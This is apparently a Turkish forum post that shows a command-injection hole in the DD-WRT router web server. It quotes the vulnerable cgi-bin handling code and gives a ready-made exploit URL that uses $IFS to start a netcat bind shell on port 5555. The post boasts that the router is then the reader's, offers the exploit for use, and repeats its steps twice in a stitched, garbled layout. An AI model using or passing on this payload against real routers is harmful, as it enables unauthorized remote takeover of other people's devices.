DD-WRT's httpd serverdeki açığı....
açığın oluşmasını sağlayan kodlar :
nmap ip -p 5555 ile tarama yaptığınızda kapalı olduğunu görürsünüz....
browser şu izni veriyor....
http://routerIP/cgi-bin/;command_to_execute
bizde bunubu şekilde kullanıyoruz...
http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
boom 5555. port açılmış...içeri dalıyoruzzz....artık server sizindir....
anlamayanlar için videolu anlatımm......
http://www.youtube.com/watch?v=UhDcXCVFrvM
anlatım ve upload bana aitdir....bi teşekkürü maruz görmeyin...
açığın oluşmasını sağlayan kodlar :
Kod:
859 if (containsstring(file, "cgi-bin")) {
860
861 auth_fail = 0;
862 if (!do_auth
863 (conn_fp, auth_userid, auth_passwd, auth_realm,
864 authorization, auth_check))
865 auth_fail = 1;
......... (snip)............
899
900 }
901 exec = fopen("/tmp/exec.tmp", "wb");
902 fprintf(exec, "export REQUEST_METHOD=\"%s\"\n", method);
903 if (query)
904 fprintf(exec, "/bin/sh %s/%s</tmp/exec.query\n",
905 server_dir != NULL ?
server_dir : "/www",file);
906 else
907 fprintf(exec, "/%s/%s\n",
908 server_dir != NULL ? server_dir : "/www",
file);
909 fclose(exec);
910
911 if (query) {
912 exec = fopen("/tmp/exec.query", "wb");
913 fprintf(exec, "%s\n", query);
914 free(query);
915 fclose(exec);
916 }
917
918 system2("chmod 700 /tmp/exec.tmp");
919 system2("/tmp/exec.tmp>/tmp/shellout.asp");
........... (snip)..........
926 if (auth_fail == 1) {
927 send_authenticate(auth_realm);
928 auth_fail = 0;nmap ip -p 5555 ile tarama yaptığınızda kapalı olduğunu görürsünüz....
browser şu izni veriyor....
http://routerIP/cgi-bin/;command_to_execute
bizde bunubu şekilde kullanıyoruz...
http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh
boom 5555. port açılmış...içeri dalıyoruzzz....artık server sizindir....
anlamayanlar için videolu anlatımm......
http://www.youtube.com/watch?v=UhDcXCVFrvM
anlatım ve upload bana aitdir....bi teşekkürü maruz görmeyin...
